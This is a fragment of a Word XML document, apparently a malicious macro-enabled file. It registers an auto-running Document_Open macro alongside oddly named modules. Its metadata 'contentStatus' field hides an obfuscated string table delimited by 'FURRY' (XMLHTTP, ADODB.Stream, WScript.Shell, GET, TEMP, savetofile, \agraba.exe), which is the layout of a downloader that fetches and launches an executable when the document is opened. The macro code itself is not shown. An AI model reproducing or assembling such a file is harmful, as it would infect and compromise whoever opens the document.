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BDC" w:rsidRDefault="00A66BDC">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00A66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F3"/>
    <w:rsid w:val="00006D9F"/>
    <w:rsid w:val="00037405"/>
    <w:rsid w:val="000C2C9F"/>
    <w:rsid w:val="00147F78"/>
    <w:rsid w:val="001522E2"/>
    <w:rsid w:val="00175DD8"/>
    <w:rsid w:val="001B129E"/>
    <w:rsid w:val="001B511E"/>
    <w:rsid w:val="001C0DE8"/>
    <w:rsid w:val="001C6771"/>
    <w:rsid w:val="00241104"/>
    <w:rsid w:val="00244B58"/>
    <w:rsid w:val="0026651C"/>
    <w:rsid w:val="002669DB"/>
    <w:rsid w:val="0027409D"/>
    <w:rsid w:val="002A4D14"/>
    <w:rsid w:val="002B0F33"/>
    <w:rsid w:val="002D7423"/>
    <w:rsid w:val="003028EE"/>
    <w:rsid w:val="0032743A"/>
    <w:rsid w:val="0034255D"/>
    <w:rsid w:val="00380F02"/>
    <w:rsid w:val="00381578"/>
    <w:rsid w:val="00391230"/>
    <w:rsid w:val="00396FF2"/>
    <w:rsid w:val="003C3CCB"/>
    <w:rsid w:val="003C7E70"/>
    <w:rsid w:val="003D2FF9"/>
    <w:rsid w:val="00420AEB"/>
    <w:rsid w:val="00443ED5"/>
    <w:rsid w:val="00454177"/>
    <w:rsid w:val="004865AD"/>
    <w:rsid w:val="004D4499"/>
    <w:rsid w:val="005212F4"/>
    <w:rsid w:val="00542889"/>
    <w:rsid w:val="00586F68"/>
    <w:rsid w:val="005A7AD1"/>
    <w:rsid w:val="00662BA7"/>
    <w:rsid w:val="006A676F"/>
    <w:rsid w:val="006A6A50"/>
    <w:rsid w:val="006C3637"/>
    <w:rsid w:val="006E7A80"/>
    <w:rsid w:val="00733D68"/>
    <w:rsid w:val="00793388"/>
    <w:rsid w:val="007A5B25"/>
    <w:rsid w:val="007E4FEE"/>
    <w:rsid w:val="007E6DE5"/>
    <w:rsid w:val="00861D6B"/>
    <w:rsid w:val="00871DAB"/>
    <w:rsid w:val="0088469E"/>
    <w:rsid w:val="008903A5"/>
    <w:rsid w:val="00897B69"/>
    <w:rsid w:val="008D7E6C"/>
    <w:rsid w:val="008E20E6"/>
    <w:rsid w:val="0092227D"/>
    <w:rsid w:val="00923C72"/>
    <w:rsid w:val="009C5994"/>
    <w:rsid w:val="009E2A01"/>
    <w:rsid w:val="00A15969"/>
    <w:rsid w:val="00A24FE8"/>
    <w:rsid w:val="00A34157"/>
    <w:rsid w:val="00A62C94"/>
    <w:rsid w:val="00A66BDC"/>
    <w:rsid w:val="00A76218"/>
    <w:rsid w:val="00A8288E"/>
    <w:rsid w:val="00AA5255"/>
    <w:rsid w:val="00AD1D10"/>
    <w:rsid w:val="00AD3B00"/>
    <w:rsid w:val="00B343F7"/>
    <w:rsid w:val="00B3676D"/>
    <w:rsid w:val="00B73625"/>
    <w:rsid w:val="00C05009"/>
    <w:rsid w:val="00C116AA"/>
    <w:rsid w:val="00C34659"/>
    <w:rsid w:val="00C65A4B"/>
    <w:rsid w:val="00C82436"/>
    <w:rsid w:val="00CB1C8B"/>
    <w:rsid w:val="00D01B1C"/>
    <w:rsid w:val="00D20F89"/>
    <w:rsid w:val="00D531E7"/>
    <w:rsid w:val="00D704ED"/>
    <w:rsid w:val="00D819F1"/>
    <w:rsid w:val="00DF77F6"/>
    <w:rsid w:val="00E03258"/>
    <w:rsid w:val="00E26AEF"/>
    <w:rsid w:val="00E26D3F"/>
    <w:rsid w:val="00E61AB7"/>
    <w:rsid w:val="00E666E8"/>
    <w:rsid w:val="00E8468C"/>
    <w:rsid w:val="00E97C6A"/>
    <w:rsid w:val="00EB2CED"/>
    <w:rsid w:val="00ED4960"/>
    <w:rsid w:val="00ED7EE0"/>
    <w:rsid w:val="00EF1BF9"/>
    <w:rsid w:val="00F111D5"/>
    <w:rsid w:val="00F640B2"/>
    <w:rsid w:val="00F733F2"/>
    <w:rsid w:val="00F82C9A"/>
    <w:rsid w:val="00F84BB5"/>
    <w:rsid w:val="00F92AB8"/>
    <w:rsid w:val="00FA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DB955-EC49-4233-94B8-DC1E5BD9C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THISDOCUMENT.DOCUMENT_OPEN" wne:name="Project.ThisDocument.Document_Open" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.MODULE1.MAPRENDER" wne:name="Project.Module1.mapRender" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.MODULE1.WRITECHAT" wne:name="Project.Module1.WriteChat" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.MODULE1.DROPFLAG" wne:name="Project.Module1.DropFlag" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.MODULE1.VERTIK" wne:name="Project.Module1.Vertik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2017-08-11T07:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-08-11T07:49:00Z</dcterms:modified>
  <cp:contentStatus>Microsoft.XMLHTTPFURRYAdodb.streaMFURRYshell.ApplicationFURRYWscript.shellFURRYProcessFURRYGeTFURRYTeMPFURRYTypeFURRYopenFURRYwriteFURRYresponseBodyFURRYsavetofileFURRY\agraba.exe</cp:contentStatus>
</cp:coreProperties>
</file>